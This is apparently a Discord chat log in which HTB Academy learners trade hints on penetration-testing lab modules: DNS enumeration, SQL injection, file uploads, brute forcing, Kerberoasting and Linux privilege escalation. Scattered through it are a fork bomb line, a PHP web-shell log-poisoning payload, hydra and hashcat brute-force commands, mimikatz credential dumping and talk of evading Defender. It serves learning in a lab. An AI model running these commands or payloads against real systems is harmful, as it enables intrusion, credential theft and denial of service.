#modules
no it won't work
:(){ :|:& };:
looks sus
or you know, have a tmux script that grabs the pid of the process in the current pane and kills it 
look like my rams enemy
its like the candy from a stranger, would you take it ?
There are two zones. Every of those contains an x amount of A records. Count them all together. Idk how else i can explain?
my ram say don't take candy from strangers
Guys, if someone can give me a hint to find the first thing to do in this module... I searched ALL PAGES for a form to have a SQLi and nothing... I tried to stop my request with Burp and nothing... https://academy.hackthebox.com/module/58/section/534
add this to the end of your dig command | grep -E "\sA\s"
Killer
wut is the first and wut is the second, am sorry my questions are dumb
ok
your math is incorrect
the second zone has more records than 4 (which you got the max of 23 somehow)
you don't need to paste it here
i'm asking you to look at it and do it for the subdomain as well
then do the math
(also you can just add | wc -l to count it for you)
ok that started making sense
a + b
= c
that's your answer
inlanefreight.htb is a zone ?
Yep the main one. There exist another one where you found the TXT record iirc
is anyone interested in this theme i made it https://github.com/vadaysakiv/terminator-terminal-theme
Ackchyually its defined as X cuz we still dont know the result 🤓 ☝️
No
Root Zone is always .
yes sir
it's defined as whatever you wanna say the variable is
OMG THIS JUST MADE SENSE NOW
i.e. if you're dealing with right triangles, conventionally you'll use a, b, c
lol
yeah my bad i meant it's the base zone that exists on the nameserver
mericie have u completed cpts path
pythagoras is fun, a^2 + b^2 = c^2
|| The only thing I am trying to find something is the payout function, I think it's this bc all the things are down else but I have nothing in burp suite 😭 || !!!
no 
Yea so those two are zones.
All other are subdomains
Iirc
com zone?
inlanefreight.htb. is the base zone
yes like sites that are .com
ΔxΔp ≥ h/4π
it looks sus
it's a tld
Top Level Domain is also a zone
each subdomain is a zone; some are overseen by different things
but how we made a sub domain a zone
subdomains are zones
and main domain is ?
That's configured by the admin. We can't make a zone by ourselves if that's your question
Can someone help me please :(...
the result of the second zone is zero 🤓
nope
Also not mandatory.
A subdomain can also be a host address.
For example, a mail server
mail.example.com.
yep, networking is important
weird now i can understand above chat🤓
Whats your command?
dig axfr @10.129.42.195 ns.inlanefreight.htb | grep -E "\sA\s" | wc -l
wrong subdomain
Wrong subdomain
thats wut i thought
it's the one that gave you the TXT record for one of the other questions
ns normally stands for nameserver and is therefore a host address
i gotta start taking notes of my answers
Wait whut? You dont do writeups for every question?
several of the questions have the right subdomain as part of their answer
note: i'm not even referencing my notes
i literally spun up pwnbox + target and ran the commands
and it worked, giving me the right answer
thought about that am gonna finish the modules and then get back and take notes
it's best to do it as you go
aka laziness
it helps reinforce knowledge
I usually take screenshot for every important step. In some a bit more even though process!
point it out if i am wrong, imagine i make website jojo now, if i have to divide my website into subdomains according to its needs like admin, dev, webadmin then i make admin.jojo.com, dev.jojo.com and webadmin.jojo.com and each subdomain has its own rights, workspace etc
Will bite you back immensely

||curl 'http://94.237.49.166:48210/cart.html'
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8'
-H 'Accept-Language: fr'
-H 'Cache-Control: max-age=0'
-H 'Connection: keep-alive'
-H 'If-Modified-Since: Mon, 28 Sep 2020 11:56:48 GMT'
-H 'If-None-Match: "3348-5b05e5c72e000-gzip"'
-H 'Sec-GPC: 1'
-H 'Upgrade-Insecure-Requests: 1'
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36'
||
I don't understand what else I can do but there is nothing I can do here... ?
Only this button is sending something somewhere else, I tried to get the "result" for the ||checkout|| but I have only this type of request when I press the button :
||curl 'http://94.237.49.166:48210/checkout.html'
-H 'Referer: http://94.237.49.166:48210/cart.html'
-H 'Upgrade-Insecure-Requests: 1'
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36'
--insecure ||
great hope you learned something aswell
yes i did
but i still have a question
i used to do it but it was taking a very long time and more work, so i skipped doing that and reduced the amount of notes to very little
Either use Firefox, or format the curl command into one line.
It's still working, just we have \.
When I use sqlmap it does the same.
What's the question you're on
Yes there are many subdomains but we can't axfr most of them. Only the main one and the one you found are basically zones where we can use zone transfer. Or else an error will occur
huh
Yea well on easy ones i just put a screenshot in
if you're gonna use multiple lines, format by putting ``` above and below the code blocks
The last.
some guessing and some knowing basic networking
Ex:
and luck ?
i meant pasting in discord
i mean basic networking gets most of the way there
localhost generally means it's on the same server
Im pretty sure you cant use axfr other subdomains. So you just need to find the ones where you can use it
Are there any other pages that may have an injection point if those aren't working?
Else it always sending # in the url.
yeah exactly
thank you so much
I read an article from someone bc I tried a lot of things and... they are saying it: ||Okay so, burpsuite, playing around with the shopping items and adding to cart registered the post request. Do the old save to a text file.||
thanks to all
i am pretty sure i have never seen this channel this much active 3-4 months before
get skill issued
"glitched" or wasn't set right
Bro I literally clicked on ALL FKING ||articles|| in this site!
No, if it was enable and my burp suite off = strange things.
lol.I don't know why but...
I got a new thing.
LETS FKING GO !
More easier 🙂 xd.
nice job
Just to have results faster than default do there is something 🤔 ?
Just trying to look at DBs and taking a very long time...
do you still need help?
Bump 😄
yes please
what's the issue?
try sekurlsa::logonPasswords if you get any different hashes.
can you send me you output?
DM?
yes
ok
probably should delete those pics, but that is not the answer
it will accept the correct answer
?
I haven't done it but like the 1337 is sticking out for me since well it's a "meme number"/ number used in cybersec a lot.
You sure it's nothing there? Like i said i haven't done it, can't help you other than what it looked a thorn in my eyes. I could be wrong
wdym?
they contain a spoiler
It's the reason why I set them as "spoiler"...
it's against tos to post it
that really doesn't mean much to mark them as spoiler
as anyone can still see them
He has to click on it to see, if he clicks it's because he wanted to see...
best practice, if you need to screenshot, is to redact anything that may be used
you should probably at least redact the flag using an image editor
Well ok...
or they can have that setting turned off
???
as spoiler text is a toggleable setting
you're posting spoilers for a skill assessment dude, just delete it
I am speaking about images.
same thing applies
it's still a toggle setting
?
it means that not everyone has the setting turned on to have it revealed on click
and always show spoiler
really stupid imo but ok...
You're very close, but something is off. You can either infer what's wrong with the string, or you can tune your attack if there's something wrong with the data returned.
not really much more i can say
But I did not understand the "attack tuning" thing...
attack tuning = adjusting your attack to get the right answer
Yeah but.
They are speaking about "strings" titles etc.
And no examples or something to help what it does.
The only thing I know it that it's a ||Time based blind||.
File Upload Attacks: Type Filters
-I need some help on how to fuzz for the image/ part of this section, the course just skips over it like I already know it
-Am I trying to do the "Add&" for the image/ part? If so where does it go?
What? This section is talking about type filters, MIME and Content... you don't need to fuzz anything. It teaches you how to bypass those type filters.
Well I added two more args but I don't know what to add else like technique or dbms... I have "HUB" and no "HTB", I concluded it but why this? Is it normal 🤔?
Colleagues continue to ask the question: What is the FQDN of the host where the last octet ends with "x.x.x.203"? I'm digging up information but I'm still not succeeding I've done subdomain enumeration but I think I'm missing the correct word list DNS Footprinting Module
I need to know which image/ will work (jpg/jpeg/png/etc)
Gives me this step:
https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt
To reduce above wordlist:
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Miscellaneous/web/content-type.txt
cat content-type.txt | grep 'image/' > image-content-types.txt (change the last .txt to new .txt)
There's a whole section on how to find that
each section builds on itself
So theres a section in Whitelist Filters using .php as the example, I'm just asking where do I go to fuzz the image/ in Content-Type
-like what part of the image/ do use the "ADD&" button on
ok let me read back through it, thanks
So marcie told you to use a "fierce" list. Meaning your current wordlist didn't have enough. Maybe listing all the lists in that directory will help you find a fierce wordlist to use against the subdomain
either not enough or just different words entirely
dnsenum --dnsserver 10.129.81.137 --enum -p 0 -s 0 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt dev.inlanefreight.htb
take the word fierce to be more literal
we're telling you your wordlist is wrong, use a different one
also delete as it's a spoiler
for the proper subdomain
So reading through it and it just tells me to fuzz the Content-Type header:
-is this correct in burp Intruder to fuzz content-type?--> §Content-Type: image/§
are you asking or are you telling that you did it and it didn't work
load the wordlist and look at it
do first before asking
if your revised command doesn't work, then ask again
I'm not gonna tell you yes/no - or explicitly tell you that this is exactly the command you do - rather guide you to figure it out on your own
im so happy i found the answer
Delete both commands since they contain spoiler

please delete your commands you posted as they contain a spoiler for the answer
I see the wordlist is image/(content), so am I only to do §image/§ ? If so it has given nothing, all 188
but congrats
thanks
This one too and you good to go
i already did
These types of questions are what really teach you how to understand the topic being discussed
i believe the hint even says the same thing "not all wordlists are the same"
if you want a more general tip: start small and go big
it's likely the subdomain exists within other wordlists as well
A real easy way to figure it out is to just try uploading a legitimate picture. See what types of pics you can upload, and when you find one capture that in burp.. and there you go.. you now have a file type template you can use to upload your exploits
thanks!
@ancient bane two things; i hope those 88 in your username are just coincidence and not something else and two don't DM without asking
Sorry
(for those curious, think about what the 8th letter of the English alphabet is)
H?
Yes
Im trying to wrap my head around this LOL. Im too tired i guess
Now think of what HH can mean (hint Germany 1942)
bro just made his account today too
Coincidence, I'll believe in - benefit of the doubt and all that
Hochwürdig************
He.. Hi..
OMG
Yea idk how that flew above my head lol
I would really like to apologize for the Dm

Sure will do
hello, i have a question about kerberoasting that is bugging me: What accounts are kerberoastable? From what I understood you need the TGT of a user to ask for a TGS right?
Kerberoast targets accounts that have a Service Principal Name (SPN) associated with them
It enables us to request the TGS for those services which can later be cracked offline.
yoo whatsup guys, I had a question.
I spawned a target on Getting started module - Nibbles Enumeration. I needed to run nmap on it but pwnbox is 0/1, so I went to my kali virtual machine but there it doesn't work. Why is that?
can anyone help me out please
Here’s a great resource
https://adsecurity.org/?p=3458
Introduction Kerberoasting can be an effective method for extracting service account credentials from Active Directory as a regular user without sending any packets to the target system. This attack is effective since people tend to create poor passwords. The reason why this attack is successful is that most service account passwords are the sam...
Are you connected to the vpn?
Nope
Yes sir. 
should I follow this for connecting to the VPN? https://academy.hackthebox.com/module/77/section/723
you need to download the academy vpn and connect to it to interact with that target
as it's on a private 10.129.x.x server
Yep you need the vpn
alright thank you so much guys, Imma do that
Ok, got it, SPN are records that links domain computers/users to a service. But imagine that we have an SPN for the user waldo for MSSQL/example.org. Is waldo kerberoastable? or do we need something before (like waldo's TGT)? How do we request a TGS for waldo ?
I'm just trying to understand the attack behind, not in a specific module/question (but currently doing Windows Attack & Defence)
I think this is happening because of bad internet connection right?
And there’s two links that was shared, kindly check them out.
Will do, thank you for the time 🙂
VPN issues? Slow connections? Can't reach machines? Start here!
Any idea how to specify a custom port with sqsh
sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h
according to the man pages -S server | host:port
though idk if it's running on a custom port
also remember that \ is an escape character in bash
so you may just need more or perhaps you can do .// and it'll just know
if someone know :>.
Are you still on the SQLMap thing?
Hmm, Thanks
tried it out, sqsh just seems to not work for this instance from what I also see on the forums
did you alternatively try .\\\\?
You can DM me if you want
Yes, just a error with the server not being recognized with sqsh.
try with mssqlclient.py ¯\_(ツ)_/¯
Doing that right now
mssqlclient.py -port 1433 htbdbuser@10.129.203.12
Seems to work while it doesn't seem to be the intended approach since it seems that I have to specify the domain and use windows-auth
While if I go with that approach with -windows-auth flag and specifying the domain
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
Any ideas of what I should try
-windows-auth or --windows-auth i forget which
oh wait i just saw
i mean you can try adding the domain? aren't you given it?
Yeah, tried adding the domain WIN-02\htbdbuser
what about INLANEFREIGHT\htbdbuser?
$ mssqlclient.py -p 1433 Administrator@DC01 -windows-auth
INLANEFREIGHT isn't the domain in the module, its the "Attacking services" one with mssql
```
SQL (htbdbuser  guest@master)> enum_links
SRV_NAME             SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE        SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT
-------------------  -----------------  ------------  --------------------  -------------------  -------------  -------
WINSRV02\SQLEXPRESS  SQLNCLI            SQL Server    WINSRV02\SQLEXPRESS   NULL                 NULL           NULL
Linked Server   Local Login   Is Self Mapping   Remote Login
```
or mssqlclient.py -p 1433 EXAMPLE/Administrator@DC01 -windows-auth
well there you have the name isn't WIN-02 either
Tried that one out also
on the easy pw lab, do you chunk up the pw.list or use the full thing? i mutated and got nothing. also reading on the forums to use the default lists not the mutated
Managed to use sqlcmd. Now trying the same approach
yes just the default.
Still don't have any permission to perform any of the actions shown in the guide
how long did it take you to get the pass? im BFing the secondary F service not the one indicated in the questions
it depends on the service you are attacking but it shouldn't take long
hmmm im attacking F not S
you can increase the threads to make it run faster
the assessment labs don't take too long when bruteforcing as compared to the ones in the section.
password attacks password mutations im stuck, ran hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list to create new password list then ran hydra -l sam -P mut_password.list ssh://<ip> and nothing. there are 120k passwords and i got past the first 4k and nothing. anyone tell me if im doing this wrong?
remove all with less than 10 chars
sed -ri '/^.{,9}$/d'
then take in the first 20k so head -n 20000 xx.list > 20k.list
it will still take a bit at its 20k passwords
but use higher threads like 48 or 64
also don't use --force, it can mess things up
well the mutated list shouldn't be 120k, it should be 94k
second: attack a different service
ssh is a slow service to brute with hydra and cme
eh telling them to narrow it down that specifically defeats (somewhat) the purpose
however cutting the first 17k lines is definitely helpful for massively speeding most of the rest of the module up
Anyone have done the Injection Attacks skill assessment? I can read the contents of passwd but I cannot find were the flag is located. Thanks in advance.
this may be dumb but is it in the filesystem root? /flag.txt?
Looks like is not there.
does the question tell you where it may be?
(i haven't done the module, but usually the questions give you a hint or place to look)
No hint. Just say Obtain the flag. Mmm maybe I am missing something dumb.
Thanks
I lost 2 hours of my life to this earlier today 😂 😭
lmao look at their xbox tag
Gottem
I need assistance again with AD Enumeration & Attacks - Skills Assessment Part I. Can someone point me in the right direction so I can find information on MS01?
MS01 is the first windows host iirc
if you sign in to it and do hostname it should tell you
I am currently connected to the webshell still. Don't know where to find the first host.
ah right the first part is on WEB01
I would say get a pivot in place or once you extract and get some creds try to rdp with them onto the WEB01 host
I have not been able to use the creds I have found to connect to anything. Am I overthinking things?
well; i would suggest trying to upgrade your shell to a full one first
a powershell one-liner or something like that
@hexed spindle what information do you need specifically?
also from the webshell you can ping MS01
@hexed spindle I did this skill assessment today
and that should tell you the IP of the MS01 machine
I knew I was overthinking something. Did not know I could simply ping MS01.
@hexed spindle you have also nslookup
Thanks for the direction!
it's in the System's hosts file
you should also be able to ping the DC01 iirc
lots of different methods of finding
doesn't look stable; those first few pings show near 1k ping
what question?
oh. I don;t believe so? but I could be wrong
it's been a hot minute
just always enumerate to be sure that you can find users
the only thing open is ssh and ftp which is not anonymous
did you try CME with smb to check for Null sessions? (-u "" -p "")
ah i forget what all services are open on the host
also 22 and 21 aren't the only one's open on that assessment
are you talking udp?
on the EASY password lab?
i was looking at the wrong thing
you had me triple looking
sec i thought i was in the password lab
i didn't use the mutated list
but I did use the provided user and password lists
once you get in; it's the easiest way to get to root from there 
user is not smart and secure
try changing the vpn region
i agree but im getting constant fails
its timing out and im not sure why its so spotty on it
your fails aren't due to hydra
ik they aren't
it's your connection with the vpn
as I suggested, changing the vpn region may fix your woes
you can try the pwnbox as well. that way even if your connection to the site drops your instance is still chugging along
the only time I would really say to be that specific is if it's seeming like for w/e reason their command looks right but still isn't working
and usually it's the dreaded "you misspelled something" error
they've stated they don't want people bruting for hours etc, so you probably have something off
i mean
you are using default threads
so it's gonna be a little slower
fair enough
i mean look at this... they have a funky network setup in an "internet ready" place
this is the WAN
their public is routed thru their edge router, ran like 400ft and then into my router
looks like you're given the 10.1.22.0 subnet
which then nats to a 10.x.x internal
their edrouter is on 10.1.14
they have a different subnet for each unit
ye
that's not that odd
and makes sense, you don't want your neighbor to be able to peek at your stuff
no ur right, but the speeds are heavily diminished
and it makes port forwarding a mess
any site recommendations of indepth anatomy of hardware components
basic motherboard especially
if you read and follow #welcome there's a #hardware-iot-ics channel that you might be able to find some resources in
how to see the time of cronjobs? the command wasn't mentioned
https://crontab.guru/every-minute here's a site that's literally just showing different ways you'd write different things for Crontab
How do you find the ftp version in the footprinting module? I've tried nmap, and I've tried status but both answers are incorrect
connect directly
mearcie when do u sleep bruh
the version is shown in the connection banner
yes
no i meant how to see if any file is running every specific time, like what command
crontab -l iirc
It says its wrong again, I think its supposed to be a HTB banner or something
this doesn't give any output
you don't include the 220 response code
i used that
Alr that worked, thank you
when you view a crontab it should give you the timing of it
ig i don't know what you're trying to do
crontab -l <user> is how you view another user's crontab (but you'd need root)
ah
but if there's no crontabs set; then it's gonna be empty
so basically they tell backup.sh to run every 3 min but to know this u need sudo priv
if it's running with root privileges, yes
the crontab is run under the user's permissions
and generally the root user is gonna be the one running the backup
that make sense now , coz there is no cron for htb-student
which, as explained, is running in a misconfigured manner
as the backup script itself is world writeable
meaning that if you edit it, you can drop a revshell
and get root
that i know, that it's writable, but was wondering how to know if it was running every 3 min or 3 hr
* * * * * <- this part is the timing
how to even get this output
when you view the crontab it shows you
the website i linked earlier shows them
its empty for htb-student and to view root we need sudo
crontab guru my beloved
yes
what module/section are you on?
i hate tools
well get used to them

because they're fuckin useful as fuck
it's literally right after that paragraph you're talking about
read the rest of the page before asking questions
ah bt not installed
i'm gonna be honest
reading really helps avoid confusion
btw the find command they give you to look for files is for world-writable documents (o+w) file perms
hello i'm stuck in "Predictable Reset Token" question 1: my script is launching but i don't get the right token
+/- 1 second iirc and the server time is in UTC
i try with this site: https://www.epochconverter.com/
where are the resource files in the pwn box
im still not pulling a password, it's timing out. im over my isp
can i dm you ?
no
you can right-click and copy the download link and paste in the pwnbox wget <paste>
i also add && unzip <filename>.zip if I know it's a zip file
oh i wasnt sure if i was able to. the last time my kali ip was the same as the pwn box
you can
also
if you're using the pwnbox, don't use the vpn
it WILL cause collision issues and break
how to i wget if i dont use my vpn
also if you're using the in-browser pwnbox: there's no need to use the vpn
yeah nevermind
Click Resources -> right-click download -> copy link
i dont use pwn box much
well well well, that tool also didn't tell the time for cron

so htb just wanted to help the user see that the backup.sh is running every 3 min but u can't find this info without sudo priv
yes but you can see it in pspy, that's how it works
Pspy doesn't read crontab, it's looking for new processes
Intro to Assembly Language - Data Movement-- "Add an instruction at the end of the attached code to move the value in "rsp" to "rax". What is the hex value of "rax" at the end of program execution? " Can anyone help me with this one? I see some posts from last year on it, but I am not seeing what anyone did to get the answer. I have tried redoing the last line in this every way I can think of...
```
global _start
section .text
_start:
mov rax, 1024
mov rbx, 2048
xchg rax, rbx
push rbx
mov rax, rsp
```
the question asked to move the value in rsp, recall the difference between the pointer and the value itself
Yeah, so I honestly dont think I understand it right, but I tried doing move rax, [rsp] as well, and flipping it, rsp, rax and rsp, [rax]
move rsp, [rax] doesn't make any sense, rax is not a pointer
so if you have used move rax, [rsp] , what do you see in gdb for the value in rax?
it doesn't seem to finish the program going that route, hold on let me check it again, so I can give you the right value I see
yes
what exactly did you enter as the answer
Hello, noob here. I am trying to count the number of installed packages. Using apt list --installed | wc -l getting wrong answer
yes
wc -l counts the line number, read the first few lines of the output to find out why the answer is wrong
wtf kind of voodoo are you running here? it now works? I have tried that sooo many times 🤦♂️
maybe it was the cut and paste fail...
alright now let's delete the answer
copy and paste
Well, thanks a ton! I got a blinding headache earlier today trying to figure out where the issue was, 
yeah just remember to check for extra spaces if you're sure the answer is right
I am going to type them out from now on for this section, I was damn sure I checked spaces, but regardless, I will take the win now!
thanks, got through it
hi im getting request validation failed when trying to start the pwnbox
okay this
this is what i wanted
THIS was a fun challenge
cant use my network to BF but i can use it to john some other stuff 
Help pls 🙂
Introduction to bash scripting-Flow Control - Loops:
Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
```
# Variables
var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"
# <- For-Loop here
for i in {1..28}
do
var=$(echo "$var" | base64)
if [[ i -eq 28 ]]
then
salt=$(( ${#var} + 1 ))
echo $salt
fi
done
# salt=$(( ${#var} + 1 ))
# echo $salt
# Check if $salt is empty
if [[ ! -z "$salt" ]]
then
decrypt
echo $flag
else
exit 1
fi
```
I've tried many different things here including var=$(echo "$var" | wc -c), setting the salt outside of the loop, using wc -c on the salt and am consistently getting the same answer of 34071. I'm running it on the box but the answer is wrong. Help is appreciated.
if [[ i -eq 28 ]] shouldn't it be $i since it's a variable?
It gives the same result regardless, unfortunately. Tried that lol
anyways that's not the right bash syntax, if you want to use a variable, it should be $var
the number is correct, did you continue with the rest of the script?
That's the end of it unless I'm missing something?
what about the decrypt function?
The decrypt function was provided in the exercise script. I left it out for brevity
yes did you run that function as a part of your script
No, I assumed it only ran in the last if statement if the salt was empty. It would make sense to use it, I just assumed I didn't need to. The instructions weren't very clear.
if [[ ! -z "$salt" ]] means not empty
Oh, right. So then it is running.
34071
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
HTBL00p5r0x
the flag is right there

I'm a literal idiot 🤣 I thought it wanted the length
Thanks @next bronze Clearly it's time for bed lmao
have you completed the medium lab? can you help me out.
Instead of pinging someone from 10 days ago ask your question, there's plenty of people here that have done the content already
i am stuck at Password Attacks Lab - Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
i got the credentials for jason user and logged in with ssh, from there i am not able to find a way to privesc?
Thank you for any hints!
what enumeration have you done at this point?
i have used sudo -l and checked the bash history, nothing there, they are saying that there is another user named Dennis, i don't know how to get that user's creds
Enumerate the internal services.
sudo -l is great for the htb machines, but cpts will require searching under every stone; if only there was an easy way to dig through a lot of information all tied up in one nice little script
Finally got through this. Number one thing I learned was that I need to seriously invest time into reverse engineering and how to find useful information in the source code of applications
I don't think it's necessary as far as pentesting is concerned, most of it is looking up CVEs that are available for the webapps or extensions for webapps
but anything helps i suppose.
anyone know why reverse shell no response?
it didn't connect
https://academy.hackthebox.com/module/143/section/1278
Hey guys, I encountered a problem, when I tried to pivot through ligolo, using bloodhound-python to extract domain related information, it could not be executed successfully, and the ligolo session automatically exited.
you can upload bloodhound on the target machine and run it from there if i remember correctly.
Is it possible to combine ligolo-ng and metasploit?
For example you want to run eternalblue Exploit on the internal hosts (1 hop).
Can you do that only with ligolo-ng and metasploit?
WINDOWS ATTACKS & DEFENSE - Coercing Attacks & Unconstrained Delegation
How am I supposed to perform the attack if the target machine is kali and i need windows?
You can use the kali machine to connect to the windows one
:/
guys sorry for stupid question, anyone know how to be able to type in HTB offtopic etc, why i can only type in htb academy chat in discord :/
If you didn't skip the onboarding you would know
Read the channels in the located in the server section
solved it, thanks, yeah mb XD
guys is it good to learn hacking on wsl
or is it preferred to learn hacking on a real linux operating system?
guys in intro to windows command line skill assessment last question how can i ssh to the domain controller ACADEMY -ICL-DC? where do i have the password?
please a hint
ACTIVE DIRECTORY ENUMERATION & ATTACKS - (Internal Password Spraying - from Windows)
" Organizations should also monitor event ID 4771: Kerberos pre-authentication failed, which may indicate an LDAP password spraying attempt. " Kerberos pre-authentication indicates LDAP password spraying attempt only if LDAP uses SASL authentication such as kerberos right? my understand is that kerberos is only used for authentication while LDAP is mainly used for querying directory service.
Anyone available for a bit of help for MODERN WEB EXPLOITATION TECHNIQUES - Exploiting XSS via WebSockets
https://academy.hackthebox.com/module/116/section/1512
The domain just isn't showing up on DNS Lookups even though I have added it to /etc/hosts
What I have tried adding to /etc/hosts
10.x.x.x inlanefreight.htb,ns1.inlanefreight.htb
└──╼ [★]$ dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
dig: couldn't get address for 'ns1.inlanefreight.htb': not found
fierce --domain inlanefreight.htb
NS: failure
SOA: failure
Failed to lookup NS/SOA, Domain does not exist
you will have to check the hint for this.
Hey guys,
in the skill assessment for file inclusion, ||every time i poison the logs the lab crashes.|| Any idea why?
||My useragent is: <?php system($_GET["cmd"]); ?>||
||Request: /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=pwd||
Hint just suggests subbrute; while that is the tool to use, it requires DNS resolution of the domain to be working
the comma is also not required.
in the /etc/hosts for the ns1 subdomain?
yeh, should be IP host host
Still isn't fixing it not being resolved,
└──╼ [★]$ nslookup inlanefreight.htb
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find inlanefreight.htb: NXDOMAIN
Any other ideas?
try using nslookup inlanefreight.htb @10.10.10.10 (or whatever the machine Ip)
nvm got it...|| 'cmd' instead of "cmd"||... 
└──╼ [★]$ nslookup inlanefreight.htb @10.129.230.13
nslookup: couldn't get address for '@10.129.230.13': not found
doesn't appear to be working, it shows up on nmap although
Is the domain included in the /etc/hosts ?
yes
└──╼ [★]$ tail -n 1 /etc/hosts
10.129.230.13 inlanefreight.htb ns1.inlanefreight.htb
try using the ns1.inlanefreight.htb domain
Server: 1.1.1.1
Address: 1.1.1.1#53
** server can't find ns1.inlanefreight.htb: NXDOMAIN
which module are you on?
could you ping inlanefreight.htb?
Somehow pinging works
ping inlanefreight.htb
Yeah, that's working.
idk whats happening
afaik htb is not an official TLD and so it cannot be resolved.
its a private network env.
shouldn't this work then?
But it has been added to the /etc/hosts to enable it being resolved
yes it should work.
The syntax is for dig not nslookup
wrong command.
oh ok
for dig.
import argparse, time, requests, os # imports four modules: argparse (command-line arguments), time (delays/timestamps), requests (HTTP/HTTPS requests), os (operating system commands)
parser = argparse.ArgumentParser(description="Interactive Web Shell for PoCs") # creates a variable called parser and uses argparse to build an argument parser with a description
parser.add_argument("-t", "--target", help="Specify the target host E.g. http://<TARGET IP>:3001/uploads/backdoor.php", required=True) # defines the -t/--target flag with a help message; required=True means the script refuses to run without it
parser.add_argument("-p", "--payload", help="Specify the reverse shell payload E.g. a python3 reverse shell. IP and Port required in the payload") # defines the optional -p/--payload flag, similar to above
parser.add_argument("-o", "--option", help="Interactive Web Shell with loop usage: python3 web_shell.py -t http://<TARGET IP>:3001/uploads/backdoor.php -o yes") # defines the optional -o/--option flag, similar to above
args = parser.parse_args() # parses the flags given on the command line into args.target, args.payload and args.option
Anyone have issues with the Hunting for Stuxbot Lab? I can’t do anything because elastic never loads any data
https://pastebin.com/Qtwh2nCc
that's the error it gives me
Managed to make it work by resetting the machine.
Now have another error
./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
Process lookup-3:
Traceback (most recent call last):
File "/usr/lib/python3.9/multiprocessing/process.py", line 315, in _bootstrap
self.run()
File "/home/htb-ac-1018999/subbrute/./subbrute.py", line 422, in run
response = self.check(hostname, query_type, timeout_retries)
File "/home/htb-ac-1018999/subbrute/./subbrute.py", line 342, in check
resp = self.resolver.query(host)
File "/home/htb-ac-1018999/subbrute/./subbrute.py", line 57, in query
name_server = self.get_ns()
File "/home/htb-ac-1018999/subbrute/./subbrute.py", line 107, in get_ns
ret = self.nameservers[self.pos]
IndexError: list index out of range
subbrute just keeps crashing even with the provided examples
add the IP to the resolver.txt file
Thanks, worked
I've got a question for the people who are doing the gamepwn module or are working with cheatengine. Do you run cheatengine in a windows vm or on your host system? I'm a little bit concerned because online you find a lot of articles about it being malware or adware.
Just wanted to know, before buying the module.
cheatengine is not malware
can you elaborate a little bit and is it still wise to run it in a vm?
you can run it in a VM or on your machine, it doesn't matter. as for the course, i didn't take it so i don't know if they instruct you to use a VM or not. my guess is they do use a vm but i really have no idea. someone else can chime in on that. i'd wager they have a vm you connect to which already has cheatengine. regardless of that, cheatengine is perfectly safe and not malware.
Thanks for your input 🙂
Can someone assist with SocksOverRDP - Not sure how to get around the defender deleting my plugin.dll
Real-time protection
Yes, real-time is that what I need to research?
It's something that needs to be disabled as well
No defender =/= no protection
Each time I upload the .dll, it gets deleted and if I am fast enough to get the command out the virus protection blocks
I have disabled windows defender
Defender and real-time protection are separate
Hi all, I'm currently trying to do the Skill Assessment of Shells && Payloads. I had to pick up the hint for the second flag where it gives you tomcat credentials.
I'm curious to understand how I should have gathered that information. The password used doesn't seem to be in any of the major wordlists (SecLists & rockyou) for tomcat. I browsed the SMB folders accessible as guest a bit but I couldn't find any clue.
Use Google to find out what you need to do
Ah ha, thank you
well, defender is real time protection
Desktop of the jump host you're given
Real-time protection is a separate service
there are other real time protections running, but defender is real time protection
You can disable defender with RTP still running
I'm referring to the actual service and option labeled "Real-Time protection"
ahh lol
Not that defender doesn't run in real-time
😱 😱 😱 😱
Indeed my bad to think about it as a clean host
so many hours wasted
At least I'm in good company haha
Thanks a lot as always
Np
hi may i ask what's the diff between RDP and WinRM? can't find much on it online, I assume RDP provides a GUI to control while WinRM is more CLI?
from what i've understood from htb academy, they are all just different remote access methods
each has its characteristics
chatgpt gives a great answer
WinRM is a CLI based remote management tool it only exists within the CLI
Yo guys i need someone to recover my gmail account
No
those are different protocols and as you said RDP provides GUI interaction while WinRM provides only cli management
Stfu
Nah, just telling you no one is gonna help you hack "your" own gmail
i see, thanks for the help guys! yep i know they are diff protocols just wondering whats the diff
If you wanna recover it go through Google Support
CLI vs GUI
this is not the place to be asking. reach out to google
Is the main difference
Other than that RDP can be enabled for any user, WinRM is generally enabled for admin users
is this a rabbit hole trying to mount hard pw lab
yep thanks!
marcie do you ever sleep
i see
No
we need to map out his online time
gonna look like 28 hours online in a day
You can search this channel for how to guides
really? is it pw protected then? trying to mount it like in the footprinting module fails
Mayhaps
Good thing there's n2john for like every filetype and encryption
Since it's likely windows, you can make an educated guess
anyone with crackmapexec skill assessment could give me a hint, please?
sure
cracking johanna takes years
HOLEY this hard lab uses everything from the past modules
one question if I have started a module with some questions answered but my subscription runs out, do I still have access to the module or do I lose the progress?
Yes
hydra -l user -P pws.list pop3://10.129.99.110 -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
